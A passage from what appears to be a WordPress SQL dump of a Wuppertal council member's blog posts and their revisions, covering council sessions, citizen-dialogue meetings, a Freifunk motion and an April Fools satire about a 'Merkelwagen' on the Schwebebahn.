Stadtteils.\r\nDesweiteren wurde der Bau von 6 neuen Kita mit insgesamt 500 Plätzen beschlossen.\r\n','Ratssitzung vom 09.03.2014','','inherit','open','open','','105-revision-v1','','','2015-03-10 09:38:54','2015-03-10 08:38:54','',105,'http://www.ollital.de/wordpress/?p=109',0,'revision','',0),(112,2,'2015-03-26 07:05:58','2015-03-26 06:05:58','Das dritte Treffen von Wuppertal 3.0 fand am 25.03.2015 im Tanzhaus am Unterbarmer Bahnhof statt. Im gut gefüllten Ballettraum gab es zunächst Impulsvorträge zu den Themen \"Familie und Soziales\", \"Bildung\", \"Kultur\" und \"Sport, die danach in Gruppen vertieft wurden.\r\nMir stellt sich allmählich die Frage nach dem Zweck dieser Arbeit, da nicht klar wird, was mit den Arbeitsergebnissen geschehen soll. Außer der Wiederholung, dass ein unabhängiger OB-Kandidat aufgestellt wird, kommt da nicht viel rüber.\r\n','3. Treffen Wuppertal 3.0','','publish','open','open','','3-treffen-wuppertal-3-0','','','2015-03-26 07:05:58','2015-03-26 06:05:58','',0,'http://www.ollital.de/wordpress/?p=112',0,'post','',0),(113,2,'2015-03-26 07:05:58','2015-03-26 06:05:58','Das dritte Treffen von Wuppertal 3.0 fand am 25.03.2015 im Tanzhaus am Unterbarmer Bahnhof statt. Im gut gefüllten Ballettraum gab es zunächst Impulsvorträge zu den Themen \"Familie und Soziales\", \"Bildung\", \"Kultur\" und \"Sport, die danach in Gruppen vertieft wurden.\r\nMir stellt sich allmählich die Frage nach dem Zweck dieser Arbeit, da nicht klar wird, was mit den Arbeitsergebnissen geschehen soll. Außer der Wiederholung, dass ein unabhängiger OB-Kandidat aufgestellt wird, kommt da nicht viel rüber.\r\n','3. Treffen Wuppertal 3.0','','inherit','open','open','','112-revision-v1','','','2015-03-26 07:05:58','2015-03-26 06:05:58','',112,'http://www.ollital.de/wordpress/?p=113',0,'revision','',0),(114,2,'2015-03-26 16:44:14','2015-03-26 15:44:14','Auf der Tagesordnung stand heute nur der Aufstellungsbeschluss für den Bebauungsplan 1209 - Rädchen Mitte -, es gab nur eine kurze Rückfrage. Danach wurde der Beschluss einstimmig gefasst und die Sitzung war nach 9 Minuten schon wieder vorbei.','Sondersitzung StaWiBau am 26.03.2015','','publish','open','open','','sondersitzung-stawibau-am-26-03-2015','','','2015-03-26 16:44:14','2015-03-26 15:44:14','',0,'http://www.ollital.de/wordpress/?p=114',0,'post','',0),(115,2,'2015-03-26 16:44:14','2015-03-26 15:44:14','Auf der Tagesordnung stand heute nur der Aufstellungsbeschluss für den Bebauungsplan 1209 - Rädchen Mitte -, es gab nur eine kurze Rückfrage. Danach wurde der Beschluss einstimmig gefasst und die Sitzung war nach 9 Minuten schon wieder vorbei.','Sondersitzung StaWiBau am 26.03.2015','','inherit','open','open','','114-revision-v1','','','2015-03-26 16:44:14','2015-03-26 15:44:14','',114,'http://www.ollital.de/wordpress/?p=115',0,'revision','',0),(116,2,'2015-03-26 16:54:47','2015-03-26 15:54:47','Auf Antrag der Fraktion Pro NRW/ REP kam der Rat heute zu einer Sondersitzung zusammen. Die beiden Tagesordnungspunkte befassen sich mit dem Demos vom 14.03.\r\nIm ersten TO sollte die Polizeiführung kritisiert werden, dass sie angeblich dem PEGIDA Aufmarsch seine demokratischen Grundrechte verwehrt hat.\r\nDazu ergriff Gerhard Wöll (Pro NRW) das Wort. Mehrfach fielen Worte wie \"Lügenpresse\", \"Lügenjournalismus\". Der Antrag wurde mit einer Gegenstimme abgelehnt.\r\nDer zweite TO griff Oberbürgermeister Jung wegen seines Auftritts bei der Gegendemo auf dem Kirchplatz an. Dazu gab der OB die Sitzungsleitung wegen Befangenheit ab.\r\nZu diesem Antrag wollte niemand das Wort ergreifen. Auch dieser wurde mit einer Gegenstimme abgelehnt.\r\nNach 11 (!) Minuten war die Sitzung dann bereits wieder geschlossen.\r\nAuffallend war, dass von der Nazifraktion nur ein Mitglied anwesend war (die anderen beiden hatten sich wohl krankgemeldet).\r\nDie Verdrehung der Tatsachen in den Anträgen ist ein offensichtliches Merkmal für die undemokratische Arbeitsweise der Fraktion von PRO NRW und REP.\r\nDie demokratischen Ratsmitglieder werden ihre Sitzungsgelder jeweils zur Hälfte an die Flüchtlingshilfen von Caritas und Diakonie zu spenden.\r\n','Sonderratssitzung vom 26.03.2015','','publish','open','open','','sonderratssitzung-vom-26-03-2015','','\nhttp://www.wuppertaler-rundschau.de/lokales/demokraten-spenden-fuer-fluechtlinge-aid-1.4973002','2015-03-27 07:01:50','2015-03-27 06:01:50','',0,'http://www.ollital.de/wordpress/?p=116',0,'post','',0),(117,2,'2015-03-26 16:54:47','2015-03-26 15:54:47','Auf Antrag der Fraktion Pro NRW/ REP kam der Rat heute zu einer Sondersitzung zusammen. Die beiden Tagesordnungspunkte befassen sich mit dem Demos vom 14.03.\r\nIm ersten TO sollte die Polizeiführung kritisiert werden, dass sie angeblich dem PEGIDA Aufmarsch seine demokratischen Grundrechte verwehrt hat.\r\nDazu ergriff Gerhard Wöll (Pro NRW) das Wort. Mehrfach fielen Worte wie \"Lügenpresse\", \"Lügenjournalismus\". Der Antrag wurde mit einer Gegenstimme abgelehnt.\r\nDer zweite TO griff Oberbürgermeister Jung wegen seines Auftritts bei der Gegendemo auf dem Kirchplatz an. Dazu gab der OB die Sitzungsleitung wegen Befangenheit ab.\r\nZu diesem Antrag wollte niemand das Wort ergreifen. Auch dieser wurde mit einer Gegenstimme abgelehnt.\r\nNach 11 (!) Minuten war die Sitzung dann bereits wieder geschlossen.\r\nAuffallend war, dass von der Nazifraktion nur ein Mitglied anwesend war (die anderen beiden hatten sich wohl krankgemeldet).\r\nDie Verdrehung der Tatsachen in den Anträgen ist ein offensichtliches Merkmal für die undemokratische Arbeitsweise der Fraktion von PRO NRW und REP.\r\n','Sonderratssitzung vom 26.03.2015','','inherit','open','open','','116-revision-v1','','','2015-03-26 16:54:47','2015-03-26 15:54:47','',116,'http://www.ollital.de/wordpress/?p=117',0,'revision','',0),(118,2,'2015-03-27 07:01:33','2015-03-27 06:01:33','Auf Antrag der Fraktion Pro NRW/ REP kam der Rat heute zu einer Sondersitzung zusammen. Die beiden Tagesordnungspunkte befassen sich mit dem Demos vom 14.03.\r\nIm ersten TO sollte die Polizeiführung kritisiert werden, dass sie angeblich dem PEGIDA Aufmarsch seine demokratischen Grundrechte verwehrt hat.\r\nDazu ergriff Gerhard Wöll (Pro NRW) das Wort. Mehrfach fielen Worte wie \"Lügenpresse\", \"Lügenjournalismus\". Der Antrag wurde mit einer Gegenstimme abgelehnt.\r\nDer zweite TO griff Oberbürgermeister Jung wegen seines Auftritts bei der Gegendemo auf dem Kirchplatz an. Dazu gab der OB die Sitzungsleitung wegen Befangenheit ab.\r\nZu diesem Antrag wollte niemand das Wort ergreifen. Auch dieser wurde mit einer Gegenstimme abgelehnt.\r\nNach 11 (!) Minuten war die Sitzung dann bereits wieder geschlossen.\r\nAuffallend war, dass von der Nazifraktion nur ein Mitglied anwesend war (die anderen beiden hatten sich wohl krankgemeldet).\r\nDie Verdrehung der Tatsachen in den Anträgen ist ein offensichtliches Merkmal für die undemokratische Arbeitsweise der Fraktion von PRO NRW und REP.\r\nDie demokratischen Ratsmitglieder werden ihre Sitzungsgelder jeweils zur Hälfte an die Flüchtlingshilfen von Caritas und Diakonie zu spenden.\r\n','Sonderratssitzung vom 26.03.2015','','inherit','open','open','','116-autosave-v1','','','2015-03-27 07:01:33','2015-03-27 06:01:33','',116,'http://www.ollital.de/wordpress/?p=118',0,'revision','',0),(119,2,'2015-03-26 19:50:08','2015-03-26 18:50:08','Auf Antrag der Fraktion Pro NRW/ REP kam der Rat heute zu einer Sondersitzung zusammen. Die beiden Tagesordnungspunkte befassen sich mit dem Demos vom 14.03.\r\nIm ersten TO sollte die Polizeiführung kritisiert werden, dass sie angeblich dem PEGIDA Aufmarsch seine demokratischen Grundrechte verwehrt hat.\r\nDazu ergriff Gerhard Wöll (Pro NRW) das Wort. Mehrfach fielen Worte wie \"Lügenpresse\", \"Lügenjournalismus\". Der Antrag wurde mit einer Gegenstimme abgelehnt.\r\nDer zweite TO griff Oberbürgermeister Jung wegen seines Auftritts bei der Gegendemo auf dem Kirchplatz an. Dazu gab der OB die Sitzungsleitung wegen Befangenheit ab.\r\nZu diesem Antrag wollte niemand das Wort ergreifen. Auch dieser wurde mit einer Gegenstimme abgelehnt.\r\nNach 11 (!) Minuten war die Sitzung dann bereits wieder geschlossen.\r\nAuffallend war, dass von der Nazifraktion nur ein Mitglied anwesend war (die anderen beiden hatten sich wohl krankgemeldet).\r\nDie Verdrehung der Tatsachen in den Anträgen ist ein offensichtliches Merkmal für die undemokratische Arbeitsweise der Fraktion von PRO NRW und REP.\r\nDie demokratischen Ratsmitglieder werden ihre Sitzungsgelder jeweils zur Hälfte an die Flüchtlingshilfen von Caritas und Diakonie zu spenden.\r\n','Sonderratssitzung vom 26.03.2015','','inherit','open','open','','116-revision-v1','','','2015-03-26 19:50:08','2015-03-26 18:50:08','',116,'http://www.ollital.de/wordpress/?p=119',0,'revision','',0),(120,2,'2015-03-27 07:01:50','2015-03-27 06:01:50','Auf Antrag der Fraktion Pro NRW/ REP kam der Rat heute zu einer Sondersitzung zusammen. Die beiden Tagesordnungspunkte befassen sich mit dem Demos vom 14.03.\r\nIm ersten TO sollte die Polizeiführung kritisiert werden, dass sie angeblich dem PEGIDA Aufmarsch seine demokratischen Grundrechte verwehrt hat.\r\nDazu ergriff Gerhard Wöll (Pro NRW) das Wort. Mehrfach fielen Worte wie \"Lügenpresse\", \"Lügenjournalismus\". Der Antrag wurde mit einer Gegenstimme abgelehnt.\r\nDer zweite TO griff Oberbürgermeister Jung wegen seines Auftritts bei der Gegendemo auf dem Kirchplatz an. Dazu gab der OB die Sitzungsleitung wegen Befangenheit ab.\r\nZu diesem Antrag wollte niemand das Wort ergreifen. Auch dieser wurde mit einer Gegenstimme abgelehnt.\r\nNach 11 (!) Minuten war die Sitzung dann bereits wieder geschlossen.\r\nAuffallend war, dass von der Nazifraktion nur ein Mitglied anwesend war (die anderen beiden hatten sich wohl krankgemeldet).\r\nDie Verdrehung der Tatsachen in den Anträgen ist ein offensichtliches Merkmal für die undemokratische Arbeitsweise der Fraktion von PRO NRW und REP.\r\nDie demokratischen Ratsmitglieder werden ihre Sitzungsgelder jeweils zur Hälfte an die Flüchtlingshilfen von Caritas und Diakonie zu spenden.\r\n','Sonderratssitzung vom 26.03.2015','','inherit','open','open','','116-revision-v1','','','2015-03-27 07:01:50','2015-03-27 06:01:50','',116,'http://www.ollital.de/wordpress/?p=120',0,'revision','',0),(122,2,'2015-04-01 07:04:02','2015-04-01 05:04:02','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der aktuellen Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthaltes im Bundestagswahlkampf 2009 gefahren, und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II mit dem\r\nKaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG, Loofs Lirpa. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lirpa weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls historische Fahrten mit Kaffee und Kuchen angeboten werden. Auch über die Möglichkeit, schwebend die Scheidung vollziehen zu können, wird nachgedacht.\r\nAb wann dieser Wagen zur Verfügung stehen wird, wurde nicht mitgeteilt. Auch zur Preisgestaltung wurden noch keine Angaben gemacht.\r\n','Der Merkelwagen','','publish','open','open','','der-merkelwagen','','','2015-04-01 12:19:33','2015-04-01 10:19:33','',0,'http://www.ollital.de/wordpress/?p=122',0,'post','',0),(123,2,'2015-03-31 22:39:08','2015-03-31 20:39:08','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW den Zug aus der Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthalts im Bundestagswahlkampf 2009 gefahren und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II.\r\nmit dem Kaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG Loofs Lipra. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lipra weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls Ausflugsfahrten mit Kaffee und Kuchen möglich sein, auch über die Möglichkeit, schwebend die Scheidung zu vollziehen wird nachgedacht.\r\nAb wann dieser Wagen dann zur Verfügung steht, wurde nicht mitgeteilt, auch der Mietpreis steht noch nicht fest.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-03-31 22:39:08','2015-03-31 20:39:08','',122,'http://www.ollital.de/wordpress/?p=123',0,'revision','',0),(124,2,'2015-03-31 22:50:14','2015-03-31 20:50:14','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthalts im Bundestagswahlkampf 2009 gefahren und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II.\r\nmit dem Kaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG Loofs Lipra. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lipra weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls Ausflugsfahrten mit Kaffee und Kuchen möglich sein, auch über die Möglichkeit, schwebend die Scheidung zu vollziehen wird nachgedacht.\r\nAb wann dieser Wagen dann zur Verfügung steht, wurde nicht mitgeteilt, auch der Mietpreis steht noch nicht fest.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-03-31 22:50:14','2015-03-31 20:50:14','',122,'http://www.ollital.de/wordpress/?p=124',0,'revision','',0),(125,2,'2015-03-31 22:52:44','2015-03-31 20:52:44','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthalts im Bundestagswahlkampf 2009 gefahren und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II.\r\nmit dem Kaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG Loofs Lipra. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lipra weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls historische Fahrten mit Kaffee und Kuchen angeboten werden, auch über die Möglichkeit, schwebend die Scheidung zu vollziehen wird nachgedacht.\r\nAb wann dieser Wagen dann zur Verfügung steht, wurde nicht mitgeteilt, auch der Mietpreis steht noch nicht fest.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-03-31 22:52:44','2015-03-31 20:52:44','',122,'http://www.ollital.de/wordpress/?p=125',0,'revision','',0),(126,2,'2015-03-31 23:19:56','2015-03-31 21:19:56','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der aktuellen Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthaltes im Bundestagswahlkampf 2009 gefahren, und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II.\r\nmit dem Kaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG, Loofs Lipra. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lipra weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls historische Fahrten mit Kaffee und Kuchen angeboten werden. Auch über die Möglichkeit, schwebend die Scheidung vollziehen zu können, wird nachgedacht.\r\nAb wann dieser Wagen zur Verfügung stehen wird, wurde nicht mitgeteilt. Auch zur Preisgestaltung wurden noch keine Angaben gemacht.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-03-31 23:19:56','2015-03-31 21:19:56','',122,'http://www.ollital.de/wordpress/?p=126',0,'revision','',0),(127,2,'2015-03-31 23:20:50','2015-03-31 21:20:50','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der aktuellen Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthaltes im Bundestagswahlkampf 2009 gefahren, und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II mit dem\r\nKaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG, Loofs Lipra. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lipra weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls historische Fahrten mit Kaffee und Kuchen angeboten werden. Auch über die Möglichkeit, schwebend die Scheidung vollziehen zu können, wird nachgedacht.\r\nAb wann dieser Wagen zur Verfügung stehen wird, wurde nicht mitgeteilt. Auch zur Preisgestaltung wurden noch keine Angaben gemacht.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-03-31 23:20:50','2015-03-31 21:20:50','',122,'http://www.ollital.de/wordpress/?p=127',0,'revision','',0),(128,2,'2015-04-01 12:19:33','2015-04-01 10:19:33','Wenn demnächst brandneue Züge die 30 Jahre alten Modelle der Wuppertaler Schwebebahn ersetzen, will die WSW einen Zug aus der aktuellen Baureihe \"GTW 72\" als weiteren historischen Wagen in Betrieb halten.\r\n\"Mit diesem Zug ist Angela Merkel während ihres Aufenthaltes im Bundestagswahlkampf 2009 gefahren, und wir möchten ihr so dieselbe historische Würdigung zukommen lassen, wie sie Kaiser Wilhelm II mit dem\r\nKaiserwagen erfährt.\", so die Sprecherin der Wuppertaler Stadtwerke AG, Loofs Lirpa. \"Es sind einige Umbauarbeiten am GTW 72 notwendig, damit dieser mit der höheren Betriebsspannung der neuen Züge zurechtkommt.\", führt Lirpa weiter aus.\r\nIm Merkelwagen sollen dann ebenfalls historische Fahrten mit Kaffee und Kuchen angeboten werden. Auch über die Möglichkeit, schwebend die Scheidung vollziehen zu können, wird nachgedacht.\r\nAb wann dieser Wagen zur Verfügung stehen wird, wurde nicht mitgeteilt. Auch zur Preisgestaltung wurden noch keine Angaben gemacht.\r\n','Der Merkelwagen','','inherit','open','open','','122-revision-v1','','','2015-04-01 12:19:33','2015-04-01 10:19:33','',122,'http://www.ollital.de/wordpress/?p=128',0,'revision','',0),(130,2,'2015-04-15 14:34:01','2015-04-15 12:34:01','Gestern abend wurde nach den einleitenden Impulsvorträgen in Workshops über die Themen\r\n
                                                                  \r\n
                                                                • Wirtschaft
                                                                • \r\n
                                                                • Jobs
                                                                • \r\n
                                                                • Zukunftsmärkte
                                                                • \r\n
                                                                \r\n\r\nDie Kernfrage des Abends war, wie kann Wuppertal als Standort für Unternehmen, Arbeitnehmer und Familien atrraktiver gemacht werden?\r\n\r\nDabei wurde klar betont, dass ein Berufs- oder Schulabschluss heutzutage unerlässlich ist und das lebensbegleitende Lernen für jeden Arbeitnehmer selbstverständlich werden muß.\r\nEs wurde die Idee eines \"Welcome\" Pakets entwickelt um junge Unternehmen und Startups an den Standort Wuppertal zu holen.\r\nMit der Bergischen Uni haben wir einen starken Kooperationspartner, um diese Themen anzugehen.\r\n\r\nAn der sehr gut gefüllten Kantine bei Riedel in der Uellendahler Str. zeigt sich, dass dieser Bürgerdialog gut angenommen wird. Allerdings wäre es zielführend, wenn dort auch häufiger andere Gesichter zu entdecken wären, um die Tehemen mehr in die Breite zu tragen.\r\n','Viertes Treffen Wuppertal 3.0','','publish','open','open','','viertes-treffen-wuppertal-3-0','','','2015-04-17 07:27:14','2015-04-17 05:27:14','',0,'http://www.ollital.de/wordpress/?p=130',0,'post','',0),(131,2,'2015-04-15 14:34:01','2015-04-15 12:34:01','Gestern abend wurde nach den einleitenden Impulsvorträgen in Workshops über die Themen\r\n
                                                                  \r\n
                                                                • Wirtschaft
                                                                • \r\n
                                                                • Jobs
                                                                • \r\n
                                                                • Zukunftsmärkte
                                                                • \r\nDabei wurde klar betont, dass ein Berufs- oder Schulabschluss heutzutage unerlässlich ist und das lebensbegleitende Lernen\r\nfür jeden Arbeitnehmer selbstverständlicgh werden muß.\r\nEs wurde die Idee eines \"Welcome\" Pakets entwickelt um junge Unternehmen und Startups an den Standort Wuppertal zu holen.\r\nMit der Uni Wuppertal haben wir einen starken Kooperationspartner, um diese Themen anzugehen.\r\n\r\nAn der sehr gut gefüllten Kantine bei Riedel in der Uellendahler Str. zeigt sich, dass dieser Bürgerdialog gut angenommen wird. Allerdings wäre es zielführend, wenn dort auch häufiger andere Gesichter zu entdecken wären, um die Tehemen mehr in die Breite zu tragen.\r\n
                                                                ','Viertes Treffen Wuppertal 3.0','','inherit','open','open','','130-revision-v1','','','2015-04-15 14:34:01','2015-04-15 12:34:01','',130,'http://www.ollital.de/wordpress/?p=131',0,'revision','',0),(132,2,'2015-04-15 14:35:09','2015-04-15 12:35:09','Gestern abend wurde nach den einleitenden Impulsvorträgen in Workshops über die Themen\r\n
                                                                  \r\n
                                                                • Wirtschaft
                                                                • \r\n
                                                                • Jobs
                                                                • \r\n
                                                                • Zukunftsmärkte
                                                                • \r\n
                                                                \r\nDabei wurde klar betont, dass ein Berufs- oder Schulabschluss heutzutage unerlässlich ist und das lebensbegleitende Lernen für jeden Arbeitnehmer selbstverständlich werden muß.\r\nEs wurde die Idee eines \"Welcome\" Pakets entwickelt um junge Unternehmen und Startups an den Standort Wuppertal zu holen.\r\nMit der Bergischen Uni haben wir einen starken Kooperationspartner, um diese Themen anzugehen.\r\n\r\nAn der sehr gut gefüllten Kantine bei Riedel in der Uellendahler Str. zeigt sich, dass dieser Bürgerdialog gut angenommen wird. Allerdings wäre es zielführend, wenn dort auch häufiger andere Gesichter zu entdecken wären, um die Tehemen mehr in die Breite zu tragen.\r\n','Viertes Treffen Wuppertal 3.0','','inherit','open','open','','130-revision-v1','','','2015-04-15 14:35:09','2015-04-15 12:35:09','',130,'http://www.ollital.de/wordpress/?p=132',0,'revision','',0),(133,2,'2015-04-17 07:26:24','2015-04-17 05:26:24','Gestern abend wurde nach den einleitenden Impulsvorträgen in Workshops über die Themen\n
                                                                  \n
                                                                • Wirtschaft
                                                                • \n
                                                                • Jobs
                                                                • \n
                                                                • Zukunftsmärkte
                                                                • \n
                                                                \n\nDie Kernfrage des Abends war, wie kann Wuppertal als Standort für Unternehmen, Arbeitnehmer \nDabei wurde klar betont, dass ein Berufs- oder Schulabschluss heutzutage unerlässlich ist und das lebensbegleitende Lernen für jeden Arbeitnehmer selbstverständlich werden muß.\nEs wurde die Idee eines \"Welcome\" Pakets entwickelt um junge Unternehmen und Startups an den Standort Wuppertal zu holen.\nMit der Bergischen Uni haben wir einen starken Kooperationspartner, um diese Themen anzugehen.\n\nAn der sehr gut gefüllten Kantine bei Riedel in der Uellendahler Str. zeigt sich, dass dieser Bürgerdialog gut angenommen wird. Allerdings wäre es zielführend, wenn dort auch häufiger andere Gesichter zu entdecken wären, um die Tehemen mehr in die Breite zu tragen.\n','Viertes Treffen Wuppertal 3.0','','inherit','open','open','','130-autosave-v1','','','2015-04-17 07:26:24','2015-04-17 05:26:24','',130,'http://www.ollital.de/wordpress/?p=133',0,'revision','',0),(134,2,'2015-04-17 07:27:14','2015-04-17 05:27:14','Gestern abend wurde nach den einleitenden Impulsvorträgen in Workshops über die Themen\r\n
                                                                  \r\n
                                                                • Wirtschaft
                                                                • \r\n
                                                                • Jobs
                                                                • \r\n
                                                                • Zukunftsmärkte
                                                                • \r\n
                                                                \r\n\r\nDie Kernfrage des Abends war, wie kann Wuppertal als Standort für Unternehmen, Arbeitnehmer und Familien atrraktiver gemacht werden?\r\n\r\nDabei wurde klar betont, dass ein Berufs- oder Schulabschluss heutzutage unerlässlich ist und das lebensbegleitende Lernen für jeden Arbeitnehmer selbstverständlich werden muß.\r\nEs wurde die Idee eines \"Welcome\" Pakets entwickelt um junge Unternehmen und Startups an den Standort Wuppertal zu holen.\r\nMit der Bergischen Uni haben wir einen starken Kooperationspartner, um diese Themen anzugehen.\r\n\r\nAn der sehr gut gefüllten Kantine bei Riedel in der Uellendahler Str. zeigt sich, dass dieser Bürgerdialog gut angenommen wird. Allerdings wäre es zielführend, wenn dort auch häufiger andere Gesichter zu entdecken wären, um die Tehemen mehr in die Breite zu tragen.\r\n','Viertes Treffen Wuppertal 3.0','','inherit','open','open','','130-revision-v1','','','2015-04-17 07:27:14','2015-04-17 05:27:14','',130,'http://www.ollital.de/wordpress/?p=134',0,'revision','',0),(135,2,'2015-04-21 22:09:01','2015-04-21 20:09:01','Aufgrund einer Umbesetzung werde stimmberechtigtes Mitglied im Betriebsausschuss Gebäudemanagement. Ich bin gespannt auf die neue Aufgabe.\r\nDie formelle Wahl innerhalb der Fraktion soll am 04.05. erfolgen.','BA Gebäudemanagement','','publish','open','open','','ba-gebaudemanagement','','','2015-04-24 23:19:17','2015-04-24 21:19:17','',0,'http://www.ollital.de/wordpress/?p=135',0,'post','',0),(136,2,'2015-04-21 22:09:01','2015-04-21 20:09:01','Aufgrund einer mbesetzung bin ich jetzt stimmberechtigtes Mitglied im Betriebsausschuss Gebäudemanagement. Ich bin gespannt auf die neue Aufgabe.','BA Gebäudemanagement','','inherit','open','open','','135-revision-v1','','','2015-04-21 22:09:01','2015-04-21 20:09:01','',135,'http://www.ollital.de/wordpress/?p=136',0,'revision','',0),(138,2,'2015-04-24 23:19:17','2015-04-24 21:19:17','Aufgrund einer Umbesetzung werde stimmberechtigtes Mitglied im Betriebsausschuss Gebäudemanagement. Ich bin gespannt auf die neue Aufgabe.\r\nDie formelle Wahl innerhalb der Fraktion soll am 04.05. erfolgen.','BA Gebäudemanagement','','inherit','open','open','','135-revision-v1','','','2015-04-24 23:19:17','2015-04-24 21:19:17','',135,'http://www.ollital.de/wordpress/?p=138',0,'revision','',0),(139,2,'2015-04-30 23:39:40','2015-04-30 21:39:40','Die Sitzung heute begann mit einem Bericht von Herrn Widmann zur Nordbahntrasse inkl. der Trassenergänzungen (Kleinbahn Loh-Hatzfeld, Sambaverlängerung,\"Schwelmer Stich\" und Schwarzbachtrasse), die in den nächsten Jahren angegangen werden sollen. Zum Teil führen diese Trassen über Grundstücke, auf denen die Stadt kein Baurecht besitzt, ohne Geld für den Kauf dieser Grundstücke wird dort nicht viel zu machen sein. Ob es eine weitere Förderung wie bei der Nordbahntrasse aus Düsseldorf geben wird, ist zweifelhaft.\r\nDie Sanierung einiger Brücken der Nordbahntrasse soll durch Umschichtung von Haushaltsmitteln jetzt angegangen werden.\r\nKontroverser diskutiert wurden die Beschlussvorlagen zum geplanten FOC in der ehemaligen Bundesbahndirektion und im Postgebäude am Kleeblatt, die Änderung des Flächennutzungsplans und der vorhabenbezogene Bebauungsplan wurden verabschiedet.','StaWiBau am 30.04.2015','','publish','open','open','','stawibau-am-30-04-2015','','','2015-04-30 23:39:40','2015-04-30 21:39:40','',0,'http://www.ollital.de/wordpress/?p=139',0,'post','',0),(140,2,'2015-04-30 23:39:40','2015-04-30 21:39:40','Die Sitzung heute begann mit einem Bericht von Herrn Widmann zur Nordbahntrasse inkl. der Trassenergänzungen (Kleinbahn Loh-Hatzfeld, Sambaverlängerung,\"Schwelmer Stich\" und Schwarzbachtrasse), die in den nächsten Jahren angegangen werden sollen. Zum Teil führen diese Trassen über Grundstücke, auf denen die Stadt kein Baurecht besitzt, ohne Geld für den Kauf dieser Grundstücke wird dort nicht viel zu machen sein. Ob es eine weitere Förderung wie bei der Nordbahntrasse aus Düsseldorf geben wird, ist zweifelhaft.\r\nDie Sanierung einiger Brücken der Nordbahntrasse soll durch Umschichtung von Haushaltsmitteln jetzt angegangen werden.\r\nKontroverser diskutiert wurden die Beschlussvorlagen zum geplanten FOC in der ehemaligen Bundesbahndirektion und im Postgebäude am Kleeblatt, die Änderung des Flächennutzungsplans und der vorhabenbezogene Bebauungsplan wurden verabschiedet.','StaWiBau am 30.04.2015','','inherit','open','open','','139-revision-v1','','','2015-04-30 23:39:40','2015-04-30 21:39:40','',139,'http://www.ollital.de/wordpress/index.php/2015/04/139-revision-v1/',0,'revision','',0),(142,2,'2015-05-05 14:00:43','2015-05-05 12:00:43','Der Ältestenrat hat heute beschlossen, unseren Freifunkantrag VO/1335/15\r\nzu vertagen, so dass er nicht im Rat am 11.05.2015 behandelt wird, sondern zunächst in die Auschusssitzung Stadtentwicklung am 11.06.2015 eingebracht wird. Dort bin ich ja auch vertreten und kann den Antrag auch im Ausschuss begleiten. Im Rat wird der Antrag voraussichtlich am 22.06. diskutiert.\r\nIch kann schlecht einschätzen, ob das gut oder schlecht für den Antrag ist, aber ich denke, ich kann auf diese Weise ein bißchen mehr Basisinformationen zu Freifunk in die Menge streuen.\r\n','Freifunkantrag wird vertagt','','publish','open','open','','freifunkantrag-wird-vertagt','','','2015-05-05 14:00:43','2015-05-05 